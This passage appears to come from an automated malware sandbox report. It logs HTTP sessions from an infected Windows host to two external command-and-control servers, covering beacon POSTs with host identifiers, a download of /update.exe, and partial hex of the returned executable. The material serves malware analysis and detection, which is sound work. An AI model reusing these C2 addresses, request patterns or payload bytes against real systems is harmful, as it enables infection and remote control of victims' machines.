                                                                                                                                                                Data Raw: 20 2b 2b 2b 5f 31 5f 64 61 38 30 66 39 36 39 30 35 37 32 65 31 39 38 36 31 38 62 31 39 62 61 33 64 32 34 61 64 64 37 63 39 36 61 66 39 65 62 38 35 65 32 38 35 37 35 62 62 65 39 65 64 64 35 63 62 64 33 63 64 61 32 64 66 33 36 2d 31 2d 5f 32 5f 64 62 63 63 63 65 36 31 35 62 37 61 66 35 66 62 35 63 38 66 37 33 63 65 36 61 37 30 39 39 61 65 39 34 36 39 39 64 61 34 64 37 62 30 63 30 33 36 61 66 61 61 62 63 64 65 61 62 38 30 38 38 65 36 62 39 37 37 33 34 64 38 62 33 35 62 33 63 64 30 39 31 38 65 2d 32 2d 5f 33 5f 61 37 65 35 39 35 32 31 30 35 35 64 65 39 62 38 34 38 63 65 30 31 62 65 36 32 37 61 39 61 65 38 64 38 31 66 65 34 63 36 64 33 66 64 62 35 36 63 61 39 65 65 63 66 62 36 64 63 63 33 65 33 38 35 64 64 30 39 2d 33 2d 5f 34 5f 61 66 65 31 39 34 33 33 30 63 35 63 63 39 38 66 34 30 64 35 37 39 39 66 33 36 32 30 61 33 64 62 65 30 33 37 63 31 65 32 66 62 63 33 39 35 34 31 38 63 64 63 63 32 38 31 65 66 66 35 63 30 39 64 63 64 37 30 2d 34 2d 5f 35 5f 64 66 38 64 64 64 32 35 31 36 36 61 65 36 62 63 36 38 38 [TRUNCATED]
                                                                                                                                                                Data Ascii: +++_1_da80f9690572e198618b19ba3d24add7c96af9eb85e28575bbe9edd5cbd3cda2df36-1-_2_dbccce615b7af5fb5c8f73ce6a7099ae94699da4d7b0c036afaabcdeab8088e6b97734d8b35b3cd0918e-2-_3_a7e59521055de9b848ce01be627a9ae8d81fe4c6d3fdb56ca9eecfb6dcc3e385dd09-3-_4_afe194330c5cc98f40d5799f3620a3dbe037c1e2fbc395418cdcc281eff5c09dcd70-4-_5_df8ddd25166ae6bc688801a7046689e6fa0b90f1f4e4b67eb3ace0a4ef85f9e2ea2357a0a87c29b3cdfeb021529870fbff2545a5ed8b81c585c8bc733bec2141b47a9370c65b5e2cb9c202ac4b1ae864feec8d47224f0cce61822e259c2411-5-


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                33192.168.2.549794185.81.68.148801248C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:37:39.641201019 CET159OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.81.68.148
                                                                                                                                                                Content-Length: 5
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 77 6c 74 3d 31
                                                                                                                                                                Data Ascii: wlt=1
                                                                                                                                                                Dec 13, 2024 01:37:41.037235975 CET711INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:37:40 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 512
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Data Raw: 20 2b 2b 2b 5f 31 5f 64 61 38 30 66 39 36 39 30 35 37 32 65 31 39 38 36 31 38 62 31 39 62 61 33 64 32 34 61 64 64 37 63 39 36 61 66 39 65 62 38 35 65 32 38 35 37 35 62 62 65 39 65 64 64 35 63 62 64 33 63 64 61 32 64 66 33 36 2d 31 2d 5f 32 5f 64 62 63 63 63 65 36 31 35 62 37 61 66 35 66 62 35 63 38 66 37 33 63 65 36 61 37 30 39 39 61 65 39 34 36 39 39 64 61 34 64 37 62 30 63 30 33 36 61 66 61 61 62 63 64 65 61 62 38 30 38 38 65 36 62 39 37 37 33 34 64 38 62 33 35 62 33 63 64 30 39 31 38 65 2d 32 2d 5f 33 5f 61 37 65 35 39 35 32 31 30 35 35 64 65 39 62 38 34 38 63 65 30 31 62 65 36 32 37 61 39 61 65 38 64 38 31 66 65 34 63 36 64 33 66 64 62 35 36 63 61 39 65 65 63 66 62 36 64 63 63 33 65 33 38 35 64 64 30 39 2d 33 2d 5f 34 5f 61 66 65 31 39 34 33 33 30 63 35 63 63 39 38 66 34 30 64 35 37 39 39 66 33 36 32 30 61 33 64 62 65 30 33 37 63 31 65 32 66 62 63 33 39 35 34 31 38 63 64 63 63 32 38 31 65 66 66 35 63 30 39 64 63 64 37 30 2d 34 2d 5f 35 5f 64 66 38 64 64 64 32 35 31 36 36 61 65 36 62 63 36 38 38 [TRUNCATED]
                                                                                                                                                                Data Ascii: +++_1_da80f9690572e198618b19ba3d24add7c96af9eb85e28575bbe9edd5cbd3cda2df36-1-_2_dbccce615b7af5fb5c8f73ce6a7099ae94699da4d7b0c036afaabcdeab8088e6b97734d8b35b3cd0918e-2-_3_a7e59521055de9b848ce01be627a9ae8d81fe4c6d3fdb56ca9eecfb6dcc3e385dd09-3-_4_afe194330c5cc98f40d5799f3620a3dbe037c1e2fbc395418cdcc281eff5c09dcd70-4-_5_df8ddd25166ae6bc688801a7046689e6fa0b90f1f4e4b67eb3ace0a4ef85f9e2ea2357a0a87c29b3cdfeb021529870fbff2545a5ed8b81c585c8bc733bec2141b47a9370c65b5e2cb9c202ac4b1ae864feec8d47224f0cce61822e259c2411-5-


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                34192.168.2.549800185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:37:40.563757896 CET278OUTPOST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-type: text/html
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Dec 13, 2024 01:37:40.684298038 CET6OUTData Raw: 48 5e 08 51
                                                                                                                                                                Data Ascii: H^Q
                                                                                                                                                                Dec 13, 2024 01:37:42.168209076 CET216INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:37:41 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                35192.168.2.549801185.81.68.148803408C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:37:42.125724077 CET158OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.81.68.148
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Dec 13, 2024 01:37:43.458689928 CET205INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:37:42 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 8
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                                                                                                                                Data Ascii: <c>3<d>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                36192.168.2.549802185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:37:42.391860962 CET278OUTPOST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-type: text/html
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Dec 13, 2024 01:37:42.511702061 CET6OUTData Raw: 48 5e 08 51
                                                                                                                                                                Data Ascii: H^Q
                                                                                                                                                                Dec 13, 2024 01:37:44.065830946 CET216INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:37:43 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                37192.168.2.549808185.81.68.147803408C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:37:42.834415913 CET184OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Content-Length: 32
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 64 31 3d 31 30 30 30 30 38 31 30 32 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                Data Ascii: d1=10000810201&unit=246122658369
                                                                                                                                                                Dec 13, 2024 01:37:44.163871050 CET201INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:37:43 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Data Raw: 20 3c 63 3e
                                                                                                                                                                Data Ascii: <c>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                38192.168.2.549809185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:37:44.307064056 CET278OUTPOST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-type: text/html
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Dec 13, 2024 01:37:44.426772118 CET6OUTData Raw: 48 5e 08 51
                                                                                                                                                                Data Ascii: H^Q
                                                                                                                                                                Dec 13, 2024 01:37:44.876769066 CET6OUTData Raw: 48 5e 08 51
                                                                                                                                                                Data Ascii: H^Q
                                                                                                                                                                Dec 13, 2024 01:37:45.317236900 CET6OUTData Raw: 48 5e 08 51
                                                                                                                                                                Data Ascii: H^Q
                                                                                                                                                                Dec 13, 2024 01:37:45.903904915 CET216INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:37:44 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                39192.168.2.549813185.81.68.148803408C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:37:45.445676088 CET312OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.81.68.148
                                                                                                                                                                Content-Length: 156
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 42 39 42 41 30 34 33 30 46 43 36 46 33 38 45 46 46 39 44 42 38 46 37 38 32 35 39 33 46 42 43 31 38 32 32 38 32 34 42 45 31 30 44 42 36 34 34 34 43 37 38 45 41 45 38 33 43 43 33 33 42
                                                                                                                                                                Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A932B9BA0430FC6F38EFF9DB8F782593FBC1822824BE10DB6444C78EAE83CC33B
                                                                                                                                                                Dec 13, 2024 01:37:46.805918932 CET204INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:37:46 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 7
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Data Raw: 20 3c 63 3e 3c 64 3e
                                                                                                                                                                Data Ascii: <c><d>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                40192.168.2.549816185.81.68.147803408C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:37:45.878642082 CET49OUTGET /update.exe HTTP/1.1
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:47.205100060 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:37:46 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                Last-Modified: Thu, 12 Dec 2024 05:53:20 GMT
                                                                                                                                                                ETag: "4b400-6290c54e671ba"
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                Content-Length: 308224
                                                                                                                                                                Content-Type: application/x-msdownload
                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 61 5c b7 69 25 3d d9 3a 25 3d d9 3a 25 3d d9 3a 2c 45 4a 3a 26 3d d9 3a 25 3d d8 3a 26 3d d9 3a 4a 4b 72 3a 2d 3d d9 3a 4a 4b 43 3a 24 3d d9 3a 4a 4b 44 3a 24 3d d9 3a 52 69 63 68 25 3d d9 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 3c 7a 5a 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0a 00 00 3a 00 00 00 2a 00 00 00 00 00 00 5c 34 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 00 05 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$a\i%=:%=:%=:,EJ:&=:%=:&=:JKr:-=:JKC:$=:JKD:$=:Rich%=:PEd<zZg":*\4@@@h((@P .text9: `.rdataP>@@.datap@.pdata@X@@.rsrc(\@@.x64`T`
                                                                                                                                                                Dec 13, 2024 01:37:47.205118895 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 89 54 24 10 48 89 4c 24 08 48 83 ec 38 48 8b 4c 24 40 ff 15
                                                                                                                                                                Data Ascii: HT$HL$H8HL$@?HD$(HT$HHL$(?HD$ HD$ H8HT$HL$H8HL$@7`HD$(HT$HHL$(*`HD$ HD$ H8H
                                                                                                                                                                Dec 13, 2024 01:37:47.205136061 CET1236INData Raw: 48 48 8d 05 75 3f 00 00 48 89 44 24 30 48 8d 05 71 3f 00 00 48 89 44 24 20 48 8d 05 79 3f 00 00 48 89 05 b6 5f 00 00 48 8d 05 6f 3f 00 00 48 89 05 50 5f 00 00 48 8d 05 79 3f 00 00 48 89 05 a2 5f 00 00 48 8d 05 a3 3f 00 00 48 89 05 5c 5f 00 00 48
                                                                                                                                                                Data Ascii: HHu?HD$0Hq?HD$ Hy?H_Ho?HP_Hy?H_H?H\_H%@H>_H?H(_H@HB_HD$(H@H@H__H@H@HM_H@H@H;_H@H@H)_H@
                                                                                                                                                                Dec 13, 2024 01:37:47.205184937 CET1236INData Raw: 00 00 e8 d2 fa ff ff 48 89 05 f3 5d 00 00 48 8d 15 f4 41 00 00 48 8d 0d 05 42 00 00 e8 b8 fa ff ff 48 89 05 e1 5d 00 00 48 8d 15 02 42 00 00 48 8d 0d 0b 42 00 00 e8 9e fa ff ff 48 89 05 cf 5d 00 00 48 8d 15 08 42 00 00 48 8d 0d 11 42 00 00 e8 84
                                                                                                                                                                Data Ascii: H]HAHBH]HBHBH]HBHBH]HBHBjH]HBH%BPH]H"BH+B6H]H(BH1BHu]H.BHGBHc]HDBHMBH
                                                                                                                                                                Dec 13, 2024 01:37:47.205209017 CET1236INData Raw: 48 8d 15 a6 43 00 00 48 8d 0d b7 43 00 00 e8 f2 f5 ff ff 48 89 05 db 57 00 00 48 8d 15 b4 43 00 00 48 8d 0d bd 43 00 00 e8 d8 f5 ff ff 48 89 05 c9 57 00 00 48 8d 15 ba 43 00 00 48 8d 0d c3 43 00 00 e8 be f5 ff ff 48 89 05 2f 57 00 00 48 8d 15 c0
                                                                                                                                                                Data Ascii: HCHCHWHCHCHWHCHCH/WHCHCHWHCHCHWHCHCpHVHCHCVHVHCHD<HVHCHD"HVHDH
                                                                                                                                                                Dec 13, 2024 01:37:47.205224991 CET1236INData Raw: 24 58 48 03 d1 48 8b ca 4c 8d 4c 24 60 44 8b c0 48 8b d1 48 8b 4c 24 38 ff 15 03 53 00 00 85 c0 74 19 83 7c 24 60 00 76 12 8b 44 24 60 8b 4c 24 48 03 c8 8b c1 89 44 24 48 eb b2 48 8b 84 24 90 00 00 00 8b 4c 24 48 89 08 48 8b 4c 24 38 ff 15 75 52
                                                                                                                                                                Data Ascii: $XHHLL$`DHHL$8St|$`vD$`L$HD$HH$L$HHL$8uRHL$PjRHD$XHxDD$T$HL$H(DD$8HT$0HBOSH(DD$T$HL$H(DD$8HT$0HBSH(DD$T$H
                                                                                                                                                                Dec 13, 2024 01:37:47.205240965 CET1236INData Raw: e9 75 05 00 00 48 8b 44 24 60 48 89 44 24 70 48 8b 44 24 70 48 63 40 3c 48 8b 4c 24 60 48 03 c8 48 8b c1 48 89 84 24 f0 00 00 00 48 8b 84 24 f0 00 00 00 8b 40 50 c7 44 24 20 40 00 00 00 41 b9 00 30 00 00 44 8b c0 48 8b 94 24 10 01 00 00 48 8b 8c
                                                                                                                                                                Data Ascii: uHD$`HD$pHD$pHc@<HL$`HHH$H$@PD$ @A0DH$H$ NH$`H$`uA3HL$`MH$@THD$ DLD$`H$H$ 3NuA3HL$`L$P$P$P
                                                                                                                                                                Dec 13, 2024 01:37:47.205256939 CET1236INData Raw: 8c 24 20 01 00 00 ff 15 0d 4a 00 00 48 8b 84 24 f0 00 00 00 8b 40 28 48 8b 8c 24 60 03 00 00 48 03 c8 48 8b c1 48 89 84 24 50 03 00 00 48 8b 84 24 50 03 00 00 48 89 84 24 f0 03 00 00 48 8d 94 24 70 03 00 00 48 8b 8c 24 28 01 00 00 ff 15 f6 49 00
                                                                                                                                                                Data Ascii: $ JH$@(H$`HHH$PH$PH$H$pH$(IuA3HL$`GH:H$(IuA3HL$` HA3HL$`HH_HT$L$H(3fD$H$HD$HD$8Hc@<HL$8HHHD$HD$
                                                                                                                                                                Dec 13, 2024 01:37:47.205465078 CET776INData Raw: 24 90 00 00 00 48 c7 44 24 20 00 00 00 00 44 8b c8 4c 8b 84 24 88 00 00 00 48 8b 54 24 48 48 8b 8c 24 80 00 00 00 ff 15 19 45 00 00 85 c0 75 05 e9 90 00 00 00 8b 84 24 90 00 00 00 48 8d 4c 24 40 48 89 4c 24 20 41 b9 20 00 00 00 44 8b c0 48 8b 54
                                                                                                                                                                Data Ascii: $HD$ DL$HT$HH$Eu$HL$@HL$ A DHT$HH$;Eu]D$DHL$HHHHD$XHD$hHD$0D$(H$HD$ LL$XA3H$CHD$`3HD$`HxH8H4HD$ LD$ 33DHD
                                                                                                                                                                Dec 13, 2024 01:37:47.205480099 CET1236INData Raw: 45 33 c9 4c 8d 05 ef fe ff ff 33 d2 33 c9 ff 15 b1 42 00 00 48 89 44 24 38 ba ff ff ff ff 48 8b 4c 24 38 ff 15 94 42 00 00 32 c0 48 83 c4 48 c3 cc cc cc cc cc cc cc cc cc 48 89 4c 24 08 48 83 ec 38 33 c0 83 f8 01 0f 84 e1 00 00 00 c7 44 24 20 00
                                                                                                                                                                Data Ascii: E3L33BHD$8HL$8B2HHHL$H83D$ D%CLZEH.ChH-?HH?HH'2HC2HO2Hc2Hw2H2H2
                                                                                                                                                                Dec 13, 2024 01:37:47.325773001 CET1236INData Raw: 15 44 3c 00 00 e8 fb fc ff ff 33 c0 83 f8 01 74 0d b9 50 c3 00 00 ff 15 dd 3b 00 00 eb ec 33 c9 ff 15 23 3c 00 00 e9 34 01 00 00 e8 cd 04 00 00 88 84 24 50 02 00 00 e8 39 fe ff ff 0f b6 c0 85 c0 74 54 48 8b 0d 77 3a 00 00 e8 de 0d 00 00 0f b6 c0
                                                                                                                                                                Data Ascii: D<3tP;3#<4$P9tTHw:uH4/t3;3tPq;3;HD$(D$ E3Lc335=H$`HD$(D$ E3LV33=H$XH


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                41192.168.2.549817185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:37:46.140810966 CET278OUTPOST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-type: text/html
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Dec 13, 2024 01:37:46.260632992 CET6OUTData Raw: 48 5e 08 51
                                                                                                                                                                Data Ascii: H^Q
                                                                                                                                                                Dec 13, 2024 01:37:47.742752075 CET216INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:37:46 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                42192.168.2.549823185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:37:47.970453024 CET278OUTPOST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-type: text/html
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Dec 13, 2024 01:37:48.090342045 CET6OUTData Raw: 48 5e 08 51
                                                                                                                                                                Data Ascii: H^Q
                                                                                                                                                                Dec 13, 2024 01:37:49.619559050 CET216INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:37:48 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                43192.168.2.549824185.81.68.148803408C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:37:48.605655909 CET158OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.81.68.148
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Dec 13, 2024 01:37:49.911746979 CET205INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:37:49 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 8
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                                                                                                                                Data Ascii: <c>3<d>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                44192.168.2.549825185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:37:49.855276108 CET278OUTPOST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-type: text/html
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Dec 13, 2024 01:37:49.975013018 CET6OUTData Raw: 48 5e 08 51
                                                                                                                                                                Data Ascii: H^Q
                                                                                                                                                                Dec 13, 2024 01:37:51.502438068 CET216INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:37:50 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                45192.168.2.549831185.81.68.147803408C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:37:50.482773066 CET184OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Content-Length: 32
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 64 31 3d 31 30 30 30 30 38 32 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                Data Ascii: d1=10000820101&unit=246122658369
                                                                                                                                                                Dec 13, 2024 01:37:51.819567919 CET201INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:37:51 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
